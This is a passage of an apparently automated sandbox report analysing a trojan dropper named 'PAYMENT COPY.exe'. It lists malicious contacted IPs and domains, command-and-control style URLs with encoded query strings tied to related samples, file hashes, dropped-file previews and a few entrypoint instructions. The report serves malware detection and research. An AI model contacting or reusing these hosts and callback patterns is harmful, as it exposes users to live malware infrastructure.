                                                http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.tiro.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.goodfont.co.krexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.carterandcone.comlexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.typography.netDexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://fontfabrik.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://181ue.com/sq.html?entry=msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        high
                                                        https://hm.baidu.com/hm.js?msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            high
                                                            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsmsdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.fonts.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.sandoll.co.krexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.sakkal.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://www.8dq98.com/enter/index.htmlmsdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown

                                                                Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                176.104.107.18
                                                                kakavjesajt.comSerbia
                                                                198371NINETRStrue
                                                                167.114.6.31
                                                                cursosdigitaisbr.comCanada
                                                                16276OVHFRtrue
                                                                35.244.230.236
                                                                www.llmav.xyzUnited States
                                                                15169GOOGLEUSfalse
                                                                23.227.38.74
                                                                shops.myshopify.comCanada
                                                                13335CLOUDFLARENETUStrue
                                                                14.129.120.32
                                                                www.beyoncos.comKorea Republic of
                                                                9286KINXIDC-AS-KRKINXKRtrue
                                                                104.21.28.135
                                                                www.sportfest40.comUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                23.225.41.92
                                                                34.anxin58.comUnited States
                                                                40065CNSERVERSUStrue
                                                                52.79.124.173
                                                                www.mg-izkerr8.netUnited States
                                                                16509AMAZON-02UStrue

                                                                General Information

                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                Analysis ID:385291
                                                                Start date:12.04.2021
                                                                Start time:09:43:56
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 9m 57s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Sample file name:PAYMENT COPY.exe
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                Number of analysed new started processes analysed:24
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@7/3@12/8
                                                                EGA Information:Failed
                                                                HDC Information:
                                                                • Successful, ratio: 22.5% (good quality ratio 20.3%)
                                                                • Quality average: 74%
                                                                • Quality standard deviation: 31.4%
                                                                HCA Information:
                                                                • Successful, ratio: 92%
                                                                • Number of executed functions: 86
                                                                • Number of non-executed functions: 61
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Found application associated with file extension: .exe
                                                                Warnings:
                                                                Show All
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                • Excluded IPs from analysis (whitelisted): 92.122.145.220, 2.23.155.186, 2.23.155.232, 52.147.198.201, 104.43.193.48, 52.255.188.83, 20.50.102.62, 92.122.213.247, 92.122.213.194, 104.43.139.144, 52.155.217.156, 20.54.26.129, 184.30.24.56, 168.61.161.212, 20.82.210.154
                                                                • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, download.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, download.windowsupdate.com.edgesuite.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                23.227.38.74Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                • www.worldsabroad.com/hx3a/?qJE0=ByCcBdCDA9ynDZ0p2mvosMnRVFdtAJOL45GnySkY7pv3UdFI4qVYyr3+Nz+s3xG49ZTQ7g==&MFNTHp=zXaxujox
                                                                winlog.exeGet hashmaliciousBrowse
                                                                • www.tagualove.com/uwec/?uzu8=4lE6ePOjgVOxQbKwmPb1ExKNrZ9hSDAusM8u/5C1B85TxEFkqvNdXJuLoKP4GsHywYGm&NjQhkT=8p44gXmp
                                                                36ne6xnkop.exeGet hashmaliciousBrowse
                                                                • www.essentiallyourscandles.com/p2io/?1bVpY=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&TVg8Ar=tFNd1Vlhj2qp
                                                                Pd0Tb0v0WW.exeGet hashmaliciousBrowse
                                                                • www.rideequihome.com/iu4d/?jBZ4=dYMXTz3oQAQLkNaLcUxsUovqIEfQQMeG6VLojiGd9Hw1vsxtxl1xN3dYL0Oy7pqqR6f8&1bz=WXrpCdsXv
                                                                giATspz5dw.exeGet hashmaliciousBrowse
                                                                • www.squeakyslimes.com/a6ru/?OtZhTl=wZOPRxK8tpyPd&KzuD=lfMB28QesiJBcE5BXZRwN/zOtPplnlykGnT8TD32dw805CVoyQ8xbgtvqYaGqJpCt+n4lE3Dhg==
                                                                IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                • www.recovatek.com/hx3a/?df=fCmUcBRkMsU23gyon11B/xiypSW2fUD8cUjfy08rELK4cGFPgnyxy77uL+u9ezJOoCatMA==&rJ=w0G8E6
                                                                HG546092227865431209.exeGet hashmaliciousBrowse
                                                                • www.dollfaceextensionsllc.net/ct6a/?j2JHaJc=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA70CqXfonfR76&KthHT=LXaP
                                                                Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                                                                • www.trendyheld.com/edbs/?BbW=d74BDEXnxoADciMbQzj0eCjrMELcvf+wOrQFljwVZdGJg+vXDTJsALwkgrXDTrto9sU7&blX=yVCTVP0X
                                                                pumYguna1i.exeGet hashmaliciousBrowse
                                                                • www.essentiallyourscandles.com/p2io/?uFNl=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&-ZSXw=ctxh_fYh
                                                                0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                • www.busybeecreates.com/bei3/?8p=EZa0cv&2d=OGWfJfpUnHsdThEHHqOdnDkqqSd1vNA2rxr/ypdVXp7lfSasz7bxTgAFATjYM0d9Yd+JVdPS6Q==
                                                                TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                • www.kinfet.com/evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu
                                                                AQJEKNHnWK.exeGet hashmaliciousBrowse
                                                                • www.gracieleesgiftsandmore.com/hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD
                                                                payment.exeGet hashmaliciousBrowse
                                                                • www.moxa-pro.com/bei3/?Rl=M48tiJch&M4YDYvh=y7EZsd/VU66W5EPJYwX5Xfv+3DSZx1f1d6WAR6GRDy2o8Omo0ZsYhDvN6jXI6rbTZYPD
                                                                Order.exeGet hashmaliciousBrowse
                                                                • www.woofytees.com/cugi/?BlL=guBtZ9/BZLKg3V3RSdvXg/8z1FJ37mZkFho76YC6dYQSBoV8kgYAqcCQ9vWS/DgnoPIa&EZXpx6=tXExBh8PdJwpH
                                                                PO91361.exeGet hashmaliciousBrowse
                                                                • www.thegreenbattle.com/sb9r/?j2JhErl=WUvo38J/IHQ2cZDNQTpzQUKmli8iSC3X7FmX7RGR1rjI+erccOscsvK8+mo5h+9Qwsc2&NXf8l=AvBHWhTxsnkxJjj0
                                                                RFQ11_ZIM2021pdf.exeGet hashmaliciousBrowse
                                                                • www.yourdadsamug.com/hmog/?U48Hj=FlcsoMQcYP8bHmq4bYup7jQaOgohKV4/DEyixY4WMPM8LbmuXu036xGPxLAWg/kNnOBQ&wP9=ndsh-n6
                                                                1517679127365.exeGet hashmaliciousBrowse
                                                                • www.dollfaceextensionsllc.net/ct6a/?YP=fbdhu8lXTJZTH&LhN0T=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA73iQHOIfF2a9
                                                                W88AZXFGH.exeGet hashmaliciousBrowse
                                                                • www.oouuweee.com/klf/?VPXl=btTL_&ojPl=MYGgbBKqv4+u3e/kdP2Xd91vi4RM/aoA3smYuNxu5fW82Y1Oa+7PC+KK+eq77k+PBZt4nUhikw==
                                                                OC CVE9362 _TVOP-MIO 2(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                                • www.shopvivreluxe.com/smzu/?IB=XIQ4zU3AjC42PFCTOO37iro6/VjVaWUNsZ/SuojON2epSeHv79IyId/eqrs49S5DR7zK&ndlpdH=xPJtZdZP
                                                                P1 032021.exeGet hashmaliciousBrowse
                                                                • www.handmadebyaspenhillfarm.com/mdi/?Y4pT-VJH=4epUEO0tHWTXkdIcuRd6Nq0v/RBz/qAjN33S7V6Z6YNQB3lA9BQkHpvYTzVx/n7sMWEr&bl=VTChTb7HLlUx2na

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                shops.myshopify.comPayment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                winlog.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                36ne6xnkop.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                Pd0Tb0v0WW.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                giATspz5dw.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                cV1uaQeOGg.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                CNTR-NO-GLDU7267089.xlsxGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                HG546092227865431209.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                pumYguna1i.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                AQJEKNHnWK.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                New Order.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                payment.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                BL836477488575.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                Order.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                PO.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                PO91361.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                NINETRShttps://nl.raymondbaez.com/xxx/redirect/Get hashmaliciousBrowse
                                                                • 104.250.166.31
                                                                https://nl.largecanvasprints.com/sd/justGet hashmaliciousBrowse
                                                                • 104.250.166.28
                                                                CLOUDFLARENETUSPO NUMBER 3120386 3120393 SIGNED.exeGet hashmaliciousBrowse
                                                                • 1.2.3.4
                                                                Cobro Juridico_07223243630_5643594_539661009070075_49874359_5059639084170590400_7272781644_pdf.exeGet hashmaliciousBrowse
                                                                • 172.67.222.176
                                                                BL2659618800638119374.xls.exeGet hashmaliciousBrowse
                                                                • 172.67.222.176
                                                                Purchase order and quote confirmation.exeGet hashmaliciousBrowse
                                                                • 172.67.222.176
                                                                Confirm Order for SK TRIMS & INDUSTRIES_DK4571,pdf.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                Re Confirm#U00ffthe invoice#U00ffthe payment slip.exeGet hashmaliciousBrowse
                                                                • 104.21.17.57
                                                                SOA.exeGet hashmaliciousBrowse
                                                                • 104.21.19.200
                                                                RFQ No A'4762GHTECHNICAL DETAILS.exeGet hashmaliciousBrowse
                                                                • 104.21.19.200
                                                                GQ5JvPEI6c.exeGet hashmaliciousBrowse
                                                                • 104.21.17.57
                                                                setupapp.exeGet hashmaliciousBrowse
                                                                • 172.67.164.1
                                                                g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                • 172.67.161.4
                                                                C++ Dropper.exeGet hashmaliciousBrowse
                                                                • 104.21.50.92
                                                                12042021493876783,xlsx.exeGet hashmaliciousBrowse
                                                                • 23.227.38.65
                                                                JSTCG21040600210 xlxs.exeGet hashmaliciousBrowse
                                                                • 104.21.19.200
                                                                PAYMENT RECEIPT.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                PO5411.exeGet hashmaliciousBrowse
                                                                • 104.21.21.198
                                                                COMMERCIAL INVOICE N#U00c2#U00ba 0001792E21.exeGet hashmaliciousBrowse
                                                                • 104.21.17.57
                                                                9479_pdf.exeGet hashmaliciousBrowse
                                                                • 172.67.222.176
                                                                fyi.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                inv.exeGet hashmaliciousBrowse
                                                                • 104.21.73.99
                                                                OVHFRSwift copy.pdf.exeGet hashmaliciousBrowse
                                                                • 51.222.80.112
                                                                PO-4147074_pdf.exeGet hashmaliciousBrowse
                                                                • 51.195.53.221
                                                                kQVi54bTM0.exeGet hashmaliciousBrowse
                                                                • 5.196.102.93
                                                                cym4u.exeGet hashmaliciousBrowse
                                                                • 188.165.17.91
                                                                Statement-ID-(400603).vbsGet hashmaliciousBrowse
                                                                • 51.89.204.5
                                                                $108,459.00.htmlGet hashmaliciousBrowse
                                                                • 146.59.152.166
                                                                LtfVNumoON.exeGet hashmaliciousBrowse
                                                                • 144.217.30.204
                                                                giATspz5dw.exeGet hashmaliciousBrowse
                                                                • 142.4.204.181
                                                                SecuriteInfo.com.__vbaHresultCheckObj.21994.exeGet hashmaliciousBrowse
                                                                • 149.202.83.171
                                                                SecuriteInfo.com.Variant.Johnnie.321295.17359.exeGet hashmaliciousBrowse
                                                                • 91.121.140.167
                                                                fileshare.docGet hashmaliciousBrowse
                                                                • 188.165.245.148
                                                                SecuriteInfo.com.Variant.Bulz.421173.18141.exeGet hashmaliciousBrowse
                                                                • 51.89.77.2
                                                                R1210322PIR-2FQUOTATION(P21C00285).exeGet hashmaliciousBrowse
                                                                • 51.38.214.75
                                                                Notice of change schedule for CID_ CMA CGM AMBER 0QA8FS1NC 0QA8GN1NC - 1st Rev.pdf.exeGet hashmaliciousBrowse
                                                                • 51.195.53.221
                                                                Notice of change schedule for CID_ CMA CGM AMBER 0QA8FS1NC 0QA8GN1NC - 1st Rev.pdf_1.exeGet hashmaliciousBrowse
                                                                • 51.195.53.221
                                                                Purchase Order No.10056.exeGet hashmaliciousBrowse
                                                                • 51.195.53.221
                                                                Quotation_pdf.exeGet hashmaliciousBrowse
                                                                • 51.195.53.221
                                                                0L2qr7kJMh40sxq.exeGet hashmaliciousBrowse
                                                                • 66.70.204.222
                                                                One.exeGet hashmaliciousBrowse
                                                                • 94.23.66.110
                                                                ORDER-02188.exeGet hashmaliciousBrowse
                                                                • 178.33.222.243

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Temp\5r6mhdppdaz
                                                                Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):164864
                                                                Entropy (8bit):7.998981429104046
                                                                Encrypted:true
                                                                SSDEEP:3072:I3WMw/3B14lKQpzny0hgpmRZ+iwo0M2RsYnd3eTkNtoWzX9Za7Zk:I3WMw/4lKQpzyG+iwoL+sMduTezXIS
                                                                MD5:62B43B42F92CF148B8EB8A59E73992DE
                                                                SHA1:27464DA3E2727CC0D42A1E6CA5623944EA7D3010
                                                                SHA-256:64A4D031533B659211B8FC9DF85BEADFE13EF2C408D38DA11918DEFE4F349B6E
                                                                SHA-512:911D0FCBA1BC073DC897A5AEA9AEC6EB2D7D5CFA2AB67AA7BCBFBABD702A1D7978A52B0855AB221733E8002EF26D9D3DA43E40ACB99B19F0D5E4AE9FF09616A6
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview: ....\K..]2........&...3:,.{d1j.k......K........Y<.........c...M..~.........s....z.gY..1S.a...~l.?w...X......iG..n..Y.~....N8..l..}....O:...L...F..l...Gw..F.*...._....ca..I..L@CW%..F..5....5..:.6.....x.I..l.....v...<{.a.D.....2............*..!.X.,T%?..n.....m...[.n...=.o..?.....V....q..C........g....H6..p.......j....Q=.....B......c.6...*....d......n.:.@.....M.F<..Jn..........p.....>V.P}..P.x..@.d.lRmj....M.P.....lP..5u'f..I.....!4..f^W.....l......8....,.C.F...6..[.._4.K,..~.W..r..x~S...ye.........F.8.W.[|V.$A..MO....&s..S5.Ei....%..d.R....p.U<].g.(.4.........../.`....G..._!N.*.e.O.*...T..U@d.........B......1.=~>8...\._..F%+"7.$*}fU....q..D..2(..@d..)..9._../. u[BF..kf\N..H.Sm.._&...5K.......Uz.h,....(.U...h.......H.Ay..1.Z.3'5.z....._....4f.J...)...z..K..[....:..({..H..[d.C4 .`T....Pg.(..sg_.......#.W$...FR|V.......{%:..-s.5.....8.:.........b.EK.....0..V..z..CL(...uX{.\\/.Bi.$y&.,..._.....p._.{...IrU.=.....U..D.:0......j..'..s..A%*.~..Z\..2.
                                                                C:\Users\user\AppData\Local\Temp\jptmg4zdrr658q2oh
                                                                Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6661
                                                                Entropy (8bit):7.249328842909832
                                                                Encrypted:false
                                                                SSDEEP:192:Jmm1XTomqd+ObD+9d4z6CYkjwVxnaehbfcGPRIm8SMW:MmpomlObD+vxPpcOcSMW
                                                                MD5:5EE12EF6F6DB0B75AB71AF53A97168E5
                                                                SHA1:1285BFEFF889668A0D04CA92ADB13B406C22D06B
                                                                SHA-256:4CE4C5E11A7F609B99BD99B0EB22F315DB167600F181467FAEEEB68FE897728A
                                                                SHA-512:27623F48F2A02E34F207A9961645ED4914C66BED07167D0305DFA29636D157F8F6708DEB359CA35598AFE84755CD8F11698AF052A37320931A3A13E6879EB251
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview: ....a.J.......{....o...}.|.....J..J..r....w..zJ..%....wM....{..ep>..J....>.d.J."...>...J.b..>.c.J.....&..J....&.h.J.)...&..J.s.....u.J........J......p.J.4...&..J.t..&.s.J...........>.d...k>..J.*>.....k>.a.J..>_c...k&..J.-&F..k&.h.J..&gh...k.n.J.,....g.d....p.J.v....s.J.....&I.J....&.h.J.5...&..J.w..>.e.J.....>...J....>.`.J. ...&..J.`..&.c.J.....&..J.......t.J.3......u......c.~...&q..d...r.....&}.q...ws...v.ppp...~r..U...n.|||...~.1.'...n.xxx.....g..}.xy.{.}J.....0hB.....p.....q............|.J.....+.......x.J.....iin.....w3q{{..`e...X...o9}{{..a...~'.....}n.x.xJ..f%.<..e...by:{}}..`...f...K..s...r.!.{{......M...K...J..J.......f...z[..J.|J.}..tq....r.{.....qJx.J.......|JedJ..K.n{J.......Y..J.........Z..n[..{.z..f...g..n...n...|.|....|......y...`Y.x....{....e.......&{&...p..>q>.>p..ke......c..m...s.N......{y....{......c..............Aa..`.{..c..f|.....r..c..l.......8;x...cP..'...J..............r.P.......o...NR=||>.~{..y&......
                                                                C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll
                                                                Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):5632
                                                                Entropy (8bit):4.077323125673351
                                                                Encrypted:false
                                                                SSDEEP:48:a97yf72xMWZhfChEsHIGmEsH/Gt4BKiZ/seNkTHfav6yYZmEeSRuqSmHSnM:1AT4IGN4/GCBKxfQKuixNHSM
                                                                MD5:ACFD9B42770B735A036C3DEABC11FFFA
                                                                SHA1:FAD50F0007FDCC82F238F882DC2A25F448FC2E97
                                                                SHA-256:D6F47850D33B1801E309180394A5557804145DAEA4818B9F17FBEECAFD364EAC
                                                                SHA-512:02AD5BF95A690B0281FCB3E0F3D466C244443AA9AFC1592C74EF7E60B5914830B9630576F516532E0A92C69495CE24F89A937EA61A8CE7BF24642308FE608D34
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                Reputation:low
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5K..fK..fK..f_..gZ..fK..fw..f...gJ..f...gJ..f..{fJ..f...gJ..fRichK..f........................PE..L...+.s`...........!......................... ...............................`............@.........................P ..P....1.......@.......................P......0 ...............................................0...............................code............................... ....data...|.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.904570189861365
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:PAYMENT COPY.exe
                                                                File size:206697
                                                                MD5:0cdbfdf044cfa1d810ed06b745ac9cd9
                                                                SHA1:124e5c370a103888227112141ea559b85ae17656
                                                                SHA256:8d85a4dbf755253e9f46aafa65f5374431e5843e6d1fa6ab61ef238919d9f6bb
                                                                SHA512:69a23fa871044faf8c58f0a67f49b2d74d72b2880eb299144fd3ee854880f40fe50f14503ce0e320af3e661a9722bc7f20a4055a000fdf9b72e1f0aeba9f5793
                                                                SSDEEP:6144:HdiVOo3WMw/4lKQpzyG+iwoL+sMduTezXIi:MVl3Jw/NYzFwQN6mezXIi
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                                                File Icon

                                                                Icon Hash:b2a88c96b2ca6a72

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x40314a
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                DLL Characteristics:
                                                                Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                Entrypoint Preview

                                                                Instruction
                                                                sub esp, 0000017Ch
                                                                push ebx
                                                                push ebp
                                                                push esi
                                                                xor esi, esi
                                                                push edi
                                                                mov dword ptr [esp+18h], esi
                                                                mov ebp, 00409240h
                                                                mov byte ptr [esp+10h], 00000020h
                                                                call dword ptr [00407030h]
                                                                push esi
                                                                call dword ptr [00407270h]
                                                                mov dword ptr [007A3030h], eax
                                                                push esi
                                                                lea eax, dword ptr [esp+30h]
                                                                push 00000160h
                                                                push eax
                                                                push esi
